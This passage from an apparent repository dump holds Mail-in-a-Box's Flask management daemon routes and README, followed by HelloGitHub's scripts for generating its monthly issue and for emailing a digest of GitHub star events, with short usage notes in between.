return json_response(resp) @app.route('/logout', methods=["POST"]) def logout(): try: email, _ = auth_service.authenticate(request, env, logout=True) app.logger.info(f"{email} logged out") except ValueError: pass finally: return json_response({ "status": "ok" }) # MAIL @app.route('/mail/users') @authorized_personnel_only def mail_users(): if request.args.get("format", "") == "json": return json_response(get_mail_users_ex(env, with_archived=True)) else: return "".join(x+"\n" for x in get_mail_users(env)) @app.route('/mail/users/add', methods=['POST']) @authorized_personnel_only def mail_users_add(): try: return add_mail_user(request.form.get('email', ''), request.form.get('password', ''), request.form.get('privileges', ''), env) except ValueError as e: return (str(e), 400) @app.route('/mail/users/password', methods=['POST']) @authorized_personnel_only def mail_users_password(): try: return set_mail_password(request.form.get('email', ''), request.form.get('password', ''), env) except ValueError as e: return (str(e), 400) @app.route('/mail/users/remove', methods=['POST']) @authorized_personnel_only def mail_users_remove(): return remove_mail_user(request.form.get('email', ''), env) @app.route('/mail/users/privileges') @authorized_personnel_only def mail_user_privs(): privs = get_mail_user_privileges(request.args.get('email', ''), env) if isinstance(privs, tuple): return privs # error return "\n".join(privs) @app.route('/mail/users/privileges/add', methods=['POST']) @authorized_personnel_only def mail_user_privs_add(): return add_remove_mail_user_privilege(request.form.get('email', ''), request.form.get('privilege', ''), "add", env) @app.route('/mail/users/privileges/remove', methods=['POST']) @authorized_personnel_only def mail_user_privs_remove(): return add_remove_mail_user_privilege(request.form.get('email', ''), request.form.get('privilege', ''), "remove", env) @app.route('/mail/aliases') @authorized_personnel_only def mail_aliases(): if request.args.get("format", "") == "json": return json_response(get_mail_aliases_ex(env)) else: return "".join(address+"\t"+receivers+"\t"+(senders or "")+"\n" for address, receivers, senders, auto in get_mail_aliases(env)) @app.route('/mail/aliases/add', methods=['POST']) @authorized_personnel_only def mail_aliases_add(): return add_mail_alias( request.form.get('address', ''), request.form.get('forwards_to', ''), request.form.get('permitted_senders', ''), env, update_if_exists=(request.form.get('update_if_exists', '') == '1') ) @app.route('/mail/aliases/remove', methods=['POST']) @authorized_personnel_only def mail_aliases_remove(): return remove_mail_alias(request.form.get('address', ''), env) @app.route('/mail/domains') @authorized_personnel_only def mail_domains(): return "".join(x+"\n" for x in get_mail_domains(env)) # DNS @app.route('/dns/zones') @authorized_personnel_only def dns_zones(): from dns_update import get_dns_zones return json_response([z[0] for z in get_dns_zones(env)]) @app.route('/dns/update', methods=['POST']) @authorized_personnel_only def dns_update(): from dns_update import do_dns_update try: return do_dns_update(env, force=request.form.get('force', '') == '1') except Exception as e: return (str(e), 500) @app.route('/dns/secondary-nameserver') @authorized_personnel_only def dns_get_secondary_nameserver(): from dns_update import get_custom_dns_config, get_secondary_dns return json_response({ "hostnames": get_secondary_dns(get_custom_dns_config(env), mode=None) }) @app.route('/dns/secondary-nameserver', methods=['POST']) 
@authorized_personnel_only def dns_set_secondary_nameserver(): from dns_update import set_secondary_dns try: return set_secondary_dns([ns.strip() for ns in re.split(r"[, ]+", request.form.get('hostnames') or "") if ns.strip() != ""], env) except ValueError as e: return (str(e), 400) @app.route('/dns/custom') @authorized_personnel_only def dns_get_records(qname=None, rtype=None): # Get the current set of custom DNS records. from dns_update import get_custom_dns_config, get_dns_zones records = get_custom_dns_config(env, only_real_records=True) # Filter per the arguments for the more complex GET routes below. records = [r for r in records if (not qname or r[0] == qname) and (not rtype or r[1] == rtype) ] # Make a better data structure. records = [ { "qname": r[0], "rtype": r[1], "value": r[2], "sort-order": { }, } for r in records ] # To help with grouping by zone in qname sorting, label each record with which zone it is in. # There's an inconsistency in how we handle zones in get_dns_zones and in sort_domains, so # do this first before sorting the domains within the zones. zones = utils.sort_domains([z[0] for z in get_dns_zones(env)], env) for r in records: for z in zones: if r["qname"] == z or r["qname"].endswith("." + z): r["zone"] = z break # Add sorting information. The 'created' order follows the order in the YAML file on disk, # which tracs the order entries were added in the control panel since we append to the end. # The 'qname' sort order sorts by our standard domain name sort (by zone then by qname), # then by rtype, and last by the original order in the YAML file (since sorting by value # may not make sense, unless we parse IP addresses, for example). for i, r in enumerate(records): r["sort-order"]["created"] = i domain_sort_order = utils.sort_domains([r["qname"] for r in records], env) for i, r in enumerate(sorted(records, key = lambda r : ( zones.index(r["zone"]) if r.get("zone") else 0, # record is not within a zone managed by the box domain_sort_order.index(r["qname"]), r["rtype"]))): r["sort-order"]["qname"] = i # Return. return json_response(records) @app.route('/dns/custom/<qname>', methods=['GET', 'POST', 'PUT', 'DELETE']) @app.route('/dns/custom/<qname>/<rtype>', methods=['GET', 'POST', 'PUT', 'DELETE']) @authorized_personnel_only def dns_set_record(qname, rtype="A"): from dns_update import do_dns_update, set_custom_dns_record try: # Normalize. rtype = rtype.upper() # Read the record value from the request BODY, which must be # ASCII-only. Not used with GET. value = request.stream.read().decode("ascii", "ignore").strip() if request.method == "GET": # Get the existing records matching the qname and rtype. return dns_get_records(qname, rtype) elif request.method in {"POST", "PUT"}: # There is a default value for A/AAAA records. if rtype in {"A", "AAAA"} and value == "": value = request.environ.get("HTTP_X_FORWARDED_FOR") # normally REMOTE_ADDR but we're behind nginx as a reverse proxy # Cannot add empty records. if value == '': return ("No value for the record provided.", 400) if request.method == "POST": # Add a new record (in addition to any existing records # for this qname-rtype pair). action = "add" elif request.method == "PUT": # In REST, PUT is supposed to be idempotent, so we'll # make this action set (replace all records for this # qname-rtype pair) rather than add (add a new record). action = "set" elif request.method == "DELETE": if value == '': # Delete all records for this qname-type pair. value = None else: # Delete just the qname-rtype-value record exactly. 
pass action = "remove" if set_custom_dns_record(qname, rtype, value, action, env): return do_dns_update(env) or "Something isn't right." return "OK" except ValueError as e: return (str(e), 400) @app.route('/dns/dump') @authorized_personnel_only def dns_get_dump(): from dns_update import build_recommended_dns return json_response(build_recommended_dns(env)) @app.route('/dns/zonefile/<zone>') @authorized_personnel_only def dns_get_zonefile(zone): from dns_update import get_dns_zonefile return Response(get_dns_zonefile(zone, env), status=200, mimetype='text/plain') # SSL @app.route('/ssl/status') @authorized_personnel_only def ssl_get_status(): from ssl_certificates import get_certificates_to_provision from web_update import get_web_domains_info, get_web_domains # What domains can we provision certificates for? What unexpected problems do we have? provision, cant_provision = get_certificates_to_provision(env, show_valid_certs=False) # What's the current status of TLS certificates on all of the domain? domains_status = get_web_domains_info(env) domains_status = [ { "domain": d["domain"], "status": d["ssl_certificate"][0], "text": d["ssl_certificate"][1] + (" " + cant_provision[d["domain"]] if d["domain"] in cant_provision else "") } for d in domains_status ] # Warn the user about domain names not hosted here because of other settings. for domain in set(get_web_domains(env, exclude_dns_elsewhere=False)) - set(get_web_domains(env)): domains_status.append({ "domain": domain, "status": "not-applicable", "text": "The domain's website is hosted elsewhere.", }) return json_response({ "can_provision": utils.sort_domains(provision, env), "status": domains_status, }) @app.route('/ssl/csr/<domain>', methods=['POST']) @authorized_personnel_only def ssl_get_csr(domain): from ssl_certificates import create_csr ssl_private_key = os.path.join(os.path.join(env["STORAGE_ROOT"], 'ssl', 'ssl_private_key.pem')) return create_csr(domain, ssl_private_key, request.form.get('countrycode', ''), env) @app.route('/ssl/install', methods=['POST']) @authorized_personnel_only def ssl_install_cert(): from web_update import get_web_domains from ssl_certificates import install_cert domain = request.form.get('domain') ssl_cert = request.form.get('cert') ssl_chain = request.form.get('chain') if domain not in get_web_domains(env): return "Invalid domain name." return install_cert(domain, ssl_cert, ssl_chain, env) @app.route('/ssl/provision', methods=['POST']) @authorized_personnel_only def ssl_provision_certs(): from ssl_certificates import provision_certificates requests = provision_certificates(env, limit_domains=None) return json_response({ "requests": requests }) # multi-factor auth @app.route('/mfa/status', methods=['POST']) @authorized_personnel_only def mfa_get_status(): # Anyone accessing this route is an admin, and we permit them to # see the MFA status for any user if they submit a 'user' form # field. But we don't include provisioning info since a user can # only provision for themselves. 
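	# (So a request for another user returns only "enabled_mfa", while a request
	# for yourself also returns "new_mfa" with a freshly provisioned TOTP setup
	# from provision_totp.)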
email = request.form.get('user', request.user_email) # user field if given, otherwise the user making the request try: resp = { "enabled_mfa": get_public_mfa_state(email, env) } if email == request.user_email: resp.update({ "new_mfa": { "totp": provision_totp(email, env) } }) except ValueError as e: return (str(e), 400) return json_response(resp) @app.route('/mfa/totp/enable', methods=['POST']) @authorized_personnel_only def totp_post_enable(): secret = request.form.get('secret') token = request.form.get('token') label = request.form.get('label') if not isinstance(token, str): return ("Bad Input", 400) try: validate_totp_secret(secret) enable_mfa(request.user_email, "totp", secret, token, label, env) except ValueError as e: return (str(e), 400) return "OK" @app.route('/mfa/disable', methods=['POST']) @authorized_personnel_only def totp_post_disable(): # Anyone accessing this route is an admin, and we permit them to # disable the MFA status for any user if they submit a 'user' form # field. email = request.form.get('user', request.user_email) # user field if given, otherwise the user making the request try: result = disable_mfa(email, request.form.get('mfa-id') or None, env) # convert empty string to None except ValueError as e: return (str(e), 400) if result: # success return "OK" else: # error return ("Invalid user or MFA id.", 400) # WEB @app.route('/web/domains') @authorized_personnel_only def web_get_domains(): from web_update import get_web_domains_info return json_response(get_web_domains_info(env)) @app.route('/web/update', methods=['POST']) @authorized_personnel_only def web_update(): from web_update import do_web_update return do_web_update(env) # System @app.route('/system/version', methods=["GET"]) @authorized_personnel_only def system_version(): from status_checks import what_version_is_this try: return what_version_is_this(env) except Exception as e: return (str(e), 500) @app.route('/system/latest-upstream-version', methods=["POST"]) @authorized_personnel_only def system_latest_upstream_version(): from status_checks import get_latest_miab_version try: return get_latest_miab_version() except Exception as e: return (str(e), 500) @app.route('/system/status', methods=["POST"]) @authorized_personnel_only def system_status(): from status_checks import run_checks class WebOutput: def __init__(self): self.items = [] def add_heading(self, heading): self.items.append({ "type": "heading", "text": heading, "extra": [] }) def print_ok(self, message): self.items.append({ "type": "ok", "text": message, "extra": [] }) def print_error(self, message): self.items.append({ "type": "error", "text": message, "extra": [] }) def print_warning(self, message): self.items.append({ "type": "warning", "text": message, "extra": [] }) def print_line(self, message, monospace=False): self.items[-1]["extra"].append({ "text": message, "monospace": monospace }) output = WebOutput() # Create a temporary pool of processes for the status checks with multiprocessing.pool.Pool(processes=5) as pool: run_checks(False, env, output, pool) pool.close() pool.join() return json_response(output.items) @app.route('/system/updates') @authorized_personnel_only def show_updates(): from status_checks import list_apt_updates return "".join( "{} ({})\n".format(p["package"], p["version"]) for p in list_apt_updates()) @app.route('/system/update-packages', methods=["POST"]) @authorized_personnel_only def do_updates(): utils.shell("check_call", ["/usr/bin/apt-get", "-qq", "update"]) return utils.shell("check_output", 
["/usr/bin/apt-get", "-y", "upgrade"], env={ "DEBIAN_FRONTEND": "noninteractive" }) @app.route('/system/reboot', methods=["GET"]) @authorized_personnel_only def needs_reboot(): from status_checks import is_reboot_needed_due_to_package_installation if is_reboot_needed_due_to_package_installation(): return json_response(True) else: return json_response(False) @app.route('/system/reboot', methods=["POST"]) @authorized_personnel_only def do_reboot(): # To keep the attack surface low, we don't allow a remote reboot if one isn't necessary. from status_checks import is_reboot_needed_due_to_package_installation if is_reboot_needed_due_to_package_installation(): return utils.shell("check_output", ["/sbin/shutdown", "-r", "now"], capture_stderr=True) else: return "No reboot is required, so it is not allowed." @app.route('/system/backup/status') @authorized_personnel_only def backup_status(): from backup import backup_status try: return json_response(backup_status(env)) except Exception as e: return json_response({ "error": str(e) }) @app.route('/system/backup/config', methods=["GET"]) @authorized_personnel_only def backup_get_custom(): from backup import get_backup_config return json_response(get_backup_config(env, for_ui=True)) @app.route('/system/backup/config', methods=["POST"]) @authorized_personnel_only def backup_set_custom(): from backup import backup_set_custom return json_response(backup_set_custom(env, request.form.get('target', ''), request.form.get('target_user', ''), request.form.get('target_pass', ''), request.form.get('min_age', '') )) @app.route('/system/privacy', methods=["GET"]) @authorized_personnel_only def privacy_status_get(): config = utils.load_settings(env) return json_response(config.get("privacy", True)) @app.route('/system/privacy', methods=["POST"]) @authorized_personnel_only def privacy_status_set(): config = utils.load_settings(env) config["privacy"] = (request.form.get('value') == "private") utils.write_settings(config, env) return "OK" # MUNIN @app.route('/munin/') @authorized_personnel_only def munin_start(): # Munin pages, static images, and dynamically generated images are served # outside of the AJAX API. We'll start with a 'start' API that sets a cookie # that subsequent requests will read for authorization. (We don't use cookies # for the API to avoid CSRF vulnerabilities.) response = make_response("OK") response.set_cookie("session", auth_service.create_session_key(request.user_email, env, type='cookie'), max_age=60*30, secure=True, httponly=True, samesite="Strict") # 30 minute duration return response def check_request_cookie_for_admin_access(): session = auth_service.get_session(None, request.cookies.get("session", ""), "cookie", env) if not session: return False privs = get_mail_user_privileges(session["email"], env) if not isinstance(privs, list): return False if "admin" not in privs: return False return True def authorized_personnel_only_via_cookie(f): @wraps(f) def g(*args, **kwargs): if not check_request_cookie_for_admin_access(): return Response("Unauthorized", status=403, mimetype='text/plain', headers={}) return f(*args, **kwargs) return g @app.route('/munin/<path:filename>') @authorized_personnel_only_via_cookie def munin_static_file(filename=""): # Proxy the request to static files. 
if filename == "": filename = "index.html" return send_from_directory("/var/cache/munin/www", filename) @app.route('/munin/cgi-graph/<path:filename>') @authorized_personnel_only_via_cookie def munin_cgi(filename): """ Relay munin cgi dynazoom requests /usr/lib/munin/cgi/munin-cgi-graph is a perl cgi script in the munin package that is responsible for generating binary png images _and_ associated HTTP headers based on parameters in the requesting URL. All output is written to stdout which munin_cgi splits into response headers and binary response data. munin-cgi-graph reads environment variables to determine what it should do. It expects a path to be in the env-var PATH_INFO, and a querystring to be in the env-var QUERY_STRING. munin-cgi-graph has several failure modes. Some write HTTP Status headers and others return nonzero exit codes. Situating munin_cgi between the user-agent and munin-cgi-graph enables keeping the cgi script behind mailinabox's auth mechanisms and avoids additional support infrastructure like spawn-fcgi. """ COMMAND = 'su munin --preserve-environment --shell=/bin/bash -c /usr/lib/munin/cgi/munin-cgi-graph' # su changes user, we use the munin user here # --preserve-environment retains the environment, which is where Popen's `env` data is # --shell=/bin/bash ensures the shell used is bash # -c "/usr/lib/munin/cgi/munin-cgi-graph" passes the command to run as munin # "%s" is a placeholder for where the request's querystring will be added if filename == "": return ("a path must be specified", 404) query_str = request.query_string.decode("utf-8", 'ignore') env = {'PATH_INFO': '/%s/' % filename, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': query_str} code, binout = utils.shell('check_output', COMMAND.split(" ", 5), # Using a maxsplit of 5 keeps the last arguments together env=env, return_bytes=True, trap=True) if code != 0: # nonzero returncode indicates error app.logger.error("munin_cgi: munin-cgi-graph returned nonzero exit code, %s", code) return ("error processing graph image", 500) # /usr/lib/munin/cgi/munin-cgi-graph returns both headers and binary png when successful. # A double-Windows-style-newline always indicates the end of HTTP headers. headers, image_bytes = binout.split(b'\r\n\r\n', 1) response = make_response(image_bytes) for line in headers.splitlines(): name, value = line.decode("utf8").split(':', 1) response.headers[name] = value if 'Status' in response.headers and '404' in response.headers['Status']: app.logger.warning("munin_cgi: munin-cgi-graph returned 404 status code. PATH_INFO=%s", env['PATH_INFO']) return response def log_failed_login(request): # We need to figure out the ip to list in the message, all our calls are routed # through nginx who will put the original ip in X-Forwarded-For. # During setup we call the management interface directly to determine the user # status. So we can't always use X-Forwarded-For because during setup that header # will not be present. ip = request.headers.getlist("X-Forwarded-For")[0] if request.headers.getlist("X-Forwarded-For") else request.remote_addr # We need to add a timestamp to the log message, otherwise /dev/log will eat the "duplicate" # message. app.logger.warning( f"Mail-in-a-Box Management Daemon: Failed login attempt from ip {ip} - timestamp {time.time()}") # APP if __name__ == '__main__': if "DEBUG" in os.environ: # Turn on Flask debugging. app.debug = True if not app.debug: app.logger.addHandler(utils.create_syslog_handler()) #app.logger.info('API key: ' + auth_service.key) # Start the application server. 
Listens on 127.0.0.1 (IPv4 only). app.run(port=10222) File: management/wsgi.py from daemon import app import utils app.logger.addHandler(utils.create_syslog_handler()) if __name__ == "__main__": app.run(port=10222)
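The management daemon above exposes every control-panel action as a plain HTTP route on 127.0.0.1:10222, each guarded by `authorized_personnel_only`. Below is a minimal client sketch against two of the routes defined above; the HTTP Basic credentials are an assumption, since the authentication handling lives earlier in `daemon.py` and is not part of this excerpt.

```python
# Minimal sketch of a local client for the management daemon shown above.
# Assumption: @authorized_personnel_only accepts HTTP Basic credentials for an
# admin account (the auth code itself is not included in this excerpt).
import requests

BASE = "http://127.0.0.1:10222"            # the daemon binds locally on port 10222
AUTH = ("[email protected]", "password")  # hypothetical admin credentials

# GET /system/version returns the installed version as plain text.
print(requests.get(BASE + "/system/version", auth=AUTH).text)

# POST /system/status runs the checks and returns the WebOutput items as JSON.
for item in requests.post(BASE + "/system/status", auth=AUTH).json():
    print(item["type"], item["text"])
```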
Mail-in-a-Box ============= By [@JoshData](https://github.com/JoshData) and [contributors](https://github.com/mail-in-a-box/mailinabox/graphs/contributors). Mail-in-a-Box helps individuals take back control of their email by defining a one-click, easy-to-deploy SMTP+everything else server: a mail server in a box. **Please see [https://mailinabox.email](https://mailinabox.email) for the project's website and setup guide!** * * * Our goals are to: * Make deploying a good mail server easy. * Promote [decentralization](http://redecentralize.org/), innovation, and privacy on the web. * Have automated, auditable, and [idempotent](https://web.archive.org/web/20190518072631/https://sharknet.us/2014/02/01/automated-configuration-management-challenges-with-idempotency/) configuration. * **Not** make a totally unhackable, NSA-proof server. * **Not** make something customizable by power users. Additionally, this project has a [Code of Conduct](CODE_OF_CONDUCT.md), which supersedes the goals above. Please review it when joining our community. In The Box ---------- Mail-in-a-Box turns a fresh Ubuntu 22.04 LTS 64-bit machine into a working mail server by installing and configuring various components. It is a one-click email appliance. There are no user-configurable setup options. It "just works." The components installed are: * SMTP ([postfix](http://www.postfix.org/)), IMAP ([Dovecot](http://dovecot.org/)), CardDAV/CalDAV ([Nextcloud](https://nextcloud.com/)), and Exchange ActiveSync ([z-push](http://z-push.org/)) servers * Webmail ([Roundcube](http://roundcube.net/)), mail filter rules (thanks to Roundcube and Dovecot), and email client autoconfig settings (served by [nginx](http://nginx.org/)) * Spam filtering ([spamassassin](https://spamassassin.apache.org/)) and greylisting ([postgrey](http://postgrey.schweikert.ch/)) * DNS ([nsd4](https://www.nlnetlabs.nl/projects/nsd/)) with [SPF](https://en.wikipedia.org/wiki/Sender_Policy_Framework), DKIM ([OpenDKIM](http://www.opendkim.org/)), [DMARC](https://en.wikipedia.org/wiki/DMARC), [DNSSEC](https://en.wikipedia.org/wiki/DNSSEC), [DANE TLSA](https://en.wikipedia.org/wiki/DNS-based_Authentication_of_Named_Entities), [MTA-STS](https://tools.ietf.org/html/rfc8461), and [SSHFP](https://tools.ietf.org/html/rfc4255) policy records automatically set * TLS certificates are automatically provisioned using [Let's Encrypt](https://letsencrypt.org/) for protecting https and all of the other services on the box * Backups ([duplicity](http://duplicity.nongnu.org/)), firewall ([ufw](https://launchpad.net/ufw)), intrusion protection ([fail2ban](http://www.fail2ban.org/wiki/index.php/Main_Page)), and basic system monitoring ([munin](http://munin-monitoring.org/)) It also includes system management tools: * Comprehensive health monitoring that checks each day that services are running, ports are open, TLS certificates are valid, and DNS records are correct * A control panel for adding/removing mail users, aliases, custom DNS records, configuring backups, etc. * An API for all of the actions on the control panel Internationalized domain names are supported and configured easily (but SMTPUTF8 is not supported, unfortunately). It also supports static website hosting since the box is serving HTTPS anyway. (To serve a website for your domains elsewhere, just add a custom DNS "A" record in you Mail-in-a-Box's control panel to point domains to another server.) For more information on how Mail-in-a-Box handles your privacy, see the [security details page](security.md). 
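Following up on the custom DNS tip above: the same record can be created programmatically through the control panel API. The sketch below is illustrative only; the `/admin/dns/custom/...` path and the Basic-auth scheme are assumptions not documented in this README, so verify them against your own box before relying on them.

```python
# Hedged sketch: point www.example.com at another web server by creating a
# custom DNS "A" record via the control panel API. The endpoint path and the
# admin credentials below are assumptions -- confirm them for your installation.
import requests

BOX = "https://box.example.com"            # your Mail-in-a-Box hostname
AUTH = ("[email protected]", "password")  # hypothetical admin credentials

resp = requests.put(
    f"{BOX}/admin/dns/custom/www.example.com/A",
    data="203.0.113.10",                   # IP address of the other server
    auth=AUTH,
)
print(resp.status_code, resp.text)
```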
Installation ------------ See the [setup guide](https://mailinabox.email/guide.html) for detailed, user-friendly instructions. For experts, start with a completely fresh (really, I mean it) Ubuntu 22.04 LTS 64-bit machine. On the machine... Clone this repository and checkout the tag corresponding to the most recent release (which you can find in the tags or releases lists on GitHub): $ git clone https://github.com/mail-in-a-box/mailinabox $ cd mailinabox $ git checkout TAGNAME Begin the installation. $ sudo setup/start.sh The installation will install, uninstall, and configure packages to turn the machine into a working, good mail server. For help, DO NOT contact Josh directly --- I don't do tech support by email or tweet (no exceptions). Post your question on the [discussion forum](https://discourse.mailinabox.email/) instead, where maintainers and Mail-in-a-Box users may be able to help you. Note that while we want everything to "just work," we can't control the rest of the Internet. Other mail services might block or spam-filter email sent from your Mail-in-a-Box. This is a challenge faced by everyone who runs their own mail server, with or without Mail-in-a-Box. See our discussion forum for tips about that. Contributing and Development ---------------------------- Mail-in-a-Box is an open source project. Your contributions and pull requests are welcome. See [CONTRIBUTING](CONTRIBUTING.md) to get started. The Acknowledgements -------------------- This project was inspired in part by the ["NSA-proof your email in 2 hours"](http://sealedabstract.com/code/nsa-proof-your-e-mail-in-2-hours/) blog post by Drew Crawford, [Sovereign](https://github.com/sovereign/sovereign) by Alex Payne, and conversations with <a href="https://twitter.com/shevski" target="_blank">@shevski</a>, <a href="https://github.com/konklone" target="_blank">@konklone</a>, and <a href="https://github.com/gregelin" target="_blank">@GregElin</a>. Mail-in-a-Box is similar to [iRedMail](http://www.iredmail.org/) and [Modoboa](https://github.com/tonioo/modoboa). The History ----------- * In 2007 I wrote a relatively popular Mozilla Thunderbird extension that added client-side SPF and DKIM checks to mail to warn users about possible phishing: [add-on page](https://addons.mozilla.org/en-us/thunderbird/addon/sender-verification-anti-phish/), [source](https://github.com/JoshData/thunderbird-spf). * In August 2013 I began Mail-in-a-Box by combining my own mail server configuration with the setup in ["NSA-proof your email in 2 hours"](http://sealedabstract.com/code/nsa-proof-your-e-mail-in-2-hours/) and making the setup steps reproducible with bash scripts. * Mail-in-a-Box was a semifinalist in the 2014 [Knight News Challenge](https://www.newschallenge.org/challenge/2014/submissions/mail-in-a-box), but it was not selected as a winner. * Mail-in-a-Box hit the front page of Hacker News in [April](https://news.ycombinator.com/item?id=7634514) 2014, [September](https://news.ycombinator.com/item?id=8276171) 2014, [May](https://news.ycombinator.com/item?id=9624267) 2015, and [November](https://news.ycombinator.com/item?id=13050500) 2016. * FastCompany mentioned Mail-in-a-Box a [roundup of privacy projects](http://www.fastcompany.com/3047645/your-own-private-cloud) on June 26, 2015.
HelloGitHub
739e7f170bd65fa27ad52804cef107c4fb020184
File: script/make_content/make_content.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 16/10/21 下午1:41 # Desc : HelloGitHub项目——生成月刊脚本 """ 该脚本主要用于:生成月刊 《HelloGitHub》月刊每期内容都遵循统一格式,如果需要对通用部分的内容进行修改,需要手动修改每一 期的内容,这是不优雅的。 所以,我打算写个脚本,用于生成月刊,这样如果修改了通用内容部分,就只需要重新生成月刊,而不需要 手动修改已发布的所有期的内容。 """ from __future__ import print_function import sys import os CONTENT_FLAG = '{{ hello_github_content }}' NUM_FLAG = '{{ hello_github_num }}' class InputError(Exception): def __init__(self, message): self.message = message def __str__(self): return repr(self.message) def check_path(path): """ 检查路径是否存在 """ if not os.path.exists(path): print('not exist: {path}'.format(path=path)) return False else: return True def read_file(input_path): with open(input_path, 'r') as fb: return fb.read() def write_file(output_path, output_data): with open(output_path, 'w') as fb: fb.write(output_data) def make_content(num): template_path = os.path.join(os.path.abspath(os.curdir), 'template.md') output_path = os.path.join(os.path.abspath(os.curdir), num) content_path = os.path.join(output_path, 'content'+num+'.md') if not (check_path(content_path) and check_path(template_path)): # 如果 content 和 template 文件不存在 return None temple_data = read_file(template_path).replace(NUM_FLAG, num) content_data = read_file(content_path) output_data = temple_data.replace(CONTENT_FLAG, content_data) write_file(os.path.join(output_path, 'HelloGitHub{num}.md'.format(num=num)), output_data) print('Make 《GitHub月刊{num}》 successful!'.format(num=num)) def make_all_content(): dir_list = os.listdir(os.path.abspath(os.curdir)) for fi_dir in dir_list: # 忽略‘script’的目录 if os.path.isdir(fi_dir) and 'script' not in fi_dir: make_content(fi_dir) def main(): """ 入口方法 """ input_list = sys.argv # 获取输入的参数 if len(input_list) != 2: raise InputError('Input error: Need a param') else: try: input_arg = input_list[1] except Exception: raise InputError('Input error: Must be number') if len(input_arg) == 1: make_content('0' + input_arg) elif input_arg == 'all': make_all_content() else: make_content(input_arg) if __name__ == '__main__': main() File: script/github_bot/github_bot.py #!/usr/bin/env python # -*- coding:utf-8 -*- # # Author : XueWeiHan # E-mail : [email protected] # Date : 16/8/30 下午10:43 # Desc : Github Bot import os import logging import smtplib import datetime from operator import itemgetter from email.mime.text import MIMEText from email.header import Header import requests logging.basicConfig( level=logging.WARNING, filename=os.path.join(os.path.dirname(__file__), 'bot_log.txt'), filemode='a', format='%(name)s %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s' ) logger = logging.getLogger('Bot') # 设置log名称 # github帐号 ACCOUNT = { 'username': '', 'password': '' } API = { 'events': 'https://api.github.com/users/{username}/received_events'.format(username=ACCOUNT['username']) } # 发送邮件,邮箱的信息 MAIL = { 'mail': '', # 发送邮件的邮箱地址 'username': '', 'password': '', 'host': 'smtp.qq.com', 'port': 465 } # 接收邮件的邮箱地址 RECEIVERS = [] # 几天前 DAY = 1 # 项目stars临界值 STARS = 100 # qq邮件服务文档:http://service.mail.qq.com/cgi-bin/help?id=28 CONTENT_FORMAT = """ <table border="2" align="center"> <tr> <th>头像</th> <th>用户名</th> <th>项目名</th> <th>starred 日期</th> <th>项目 star 数量</th> </tr> {project_info_string} </table> """ def get_data(page=1): """ 从目标源获取数据 https://developer.github.com/v3/activity/events/ GitHub 规定:默认每页 30 条,最多 300 条目 """ args = '?page={page}'.format(page=page) response = requests.get(API['events']+args, 
auth=(ACCOUNT['username'], ACCOUNT['password'])) status_code = response.status_code if status_code == 200: resp_json = response.json() return resp_json else: logging.error('请求 event api 失败:', status_code) return [] def get_all_data(): """ 获取全部 300 条的数据 https://developer.github.com/v3/activity/events/ GitHub 规定:默认每页 30 条,最多 300 条目 """ all_data_list = [] for i in range(10): response_json = get_data(i+1) if response_json: all_data_list.extend(response_json) return all_data_list def check_condition(data): """ 过滤条件 """ create_time = datetime.datetime.strptime( data['created_at'], "%Y-%m-%dT%H:%M:%SZ") + datetime.timedelta(hours=8) date_condition = create_time >= (datetime.datetime.now() - datetime.timedelta(days=DAY)) if (data['type'] == 'WatchEvent') and date_condition: # 不统计自己项目的star事件 if data['payload']['action'] == 'started' and \ ACCOUNT['username'] not in data['repo']['name']: data['date_time'] = create_time.strftime("%Y-%m-%d %H:%M:%S") return True else: return False def analyze(json_data): """ 分析获取的数据 :return 符合过滤条件的数据 """ result_data = [] for fi_data in json_data: if check_condition(fi_data): result_data.append(fi_data) return result_data def get_stars(data): """ 获取stars数量,同时过滤掉stars数量少的项目 """ project_info_list = [] for fi_data in data: project_info = dict() project_info['user'] = fi_data['actor']['login'] project_info['user_url'] = 'https://github.com/' + project_info['user'] project_info['avatar_url'] = fi_data['actor']['avatar_url'] project_info['repo_name'] = fi_data['repo']['name'] project_info['repo_url'] = 'https://github.com/' + project_info['repo_name'] project_info['date_time'] = fi_data['date_time'] try: repo_stars = requests.get(fi_data['repo']['url'], timeout=2).json() if repo_stars: project_info['repo_stars'] = int(repo_stars['stargazers_count']) else: project_info['repo_stars'] = -1 except Exception as e: project_info['repo_stars'] = -1 logger.warning(u'获取:{} 项目星数失败——{}'.format( project_info['repo_name'], e)) finally: if project_info['repo_stars'] >= STARS or project_info['repo_stars'] == -1: # 过滤掉star数量低于临界值的项目 project_info_list.append(project_info) project_info_list = sorted(project_info_list, key=itemgetter('repo_stars'), reverse=True) return project_info_list def make_content(): """ 生成发布邮件的内容 """ json_data = get_all_data() data = analyze(json_data) content = [] project_info_list = get_stars(data) for project_info in project_info_list: project_info_string = """<tr> <td><img src={avatar_url} width=32px></img></td> <td><a href={user_url}>{user}</a></td> <td><a href={repo_url}>{repo_name}</a></td> <td>{date_time}</td> <td>{repo_stars}</td> </tr> """.format(**project_info) content.append(project_info_string) return content def send_email(receivers, email_content): """ 发送邮件 """ sender = MAIL['mail'] # 发送邮件的邮箱 receivers = receivers # 接收邮件的邮箱,可设置多个 # 三个参数:第一个为文本内容,第二个 html 设置文本格式,第三个 utf-8 设置编码 message = MIMEText( CONTENT_FORMAT.format(project_info_string=''.join(email_content)), 'html', 'utf-8' ) message['From'] = Header(u'GitHub 机器人', 'utf-8') message['To'] = Header(u'削微寒', 'utf-8') subject = u'今日 GitHub 热点' # 设置邮件主题 message['Subject'] = Header(subject, 'utf-8') try: smtp_obj = smtplib.SMTP_SSL() # qq邮箱要求是https连接,所以需要用SMTP_SSL smtp_obj.connect(MAIL['host'], MAIL['port']) # 设置SMTP地址和端口号 smtp_obj.login(MAIL['username'], MAIL['password']) smtp_obj.sendmail(sender, receivers, message.as_string()) except smtplib.SMTPException as e: logger.error(u"无法发送邮件: {}".format(e)) if __name__ == '__main__': content = make_content() send_email(RECEIVERS, content)
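One practical note on the bot above: `get_data` authenticates to the GitHub events API with a username and password, but GitHub's REST API no longer accepts account passwords for Basic authentication. A minimal sketch of the same request using a personal access token is shown below; the username and token values are placeholders.

```python
# Sketch: fetch one page of received events with a personal access token,
# since password-based Basic auth is no longer accepted by api.github.com.
# GITHUB_USERNAME and GITHUB_TOKEN are placeholders you must supply yourself.
import requests

GITHUB_USERNAME = "your-username"
GITHUB_TOKEN = "ghp_xxx"  # a personal access token, not your account password

def get_received_events(page=1):
    url = f"https://api.github.com/users/{GITHUB_USERNAME}/received_events"
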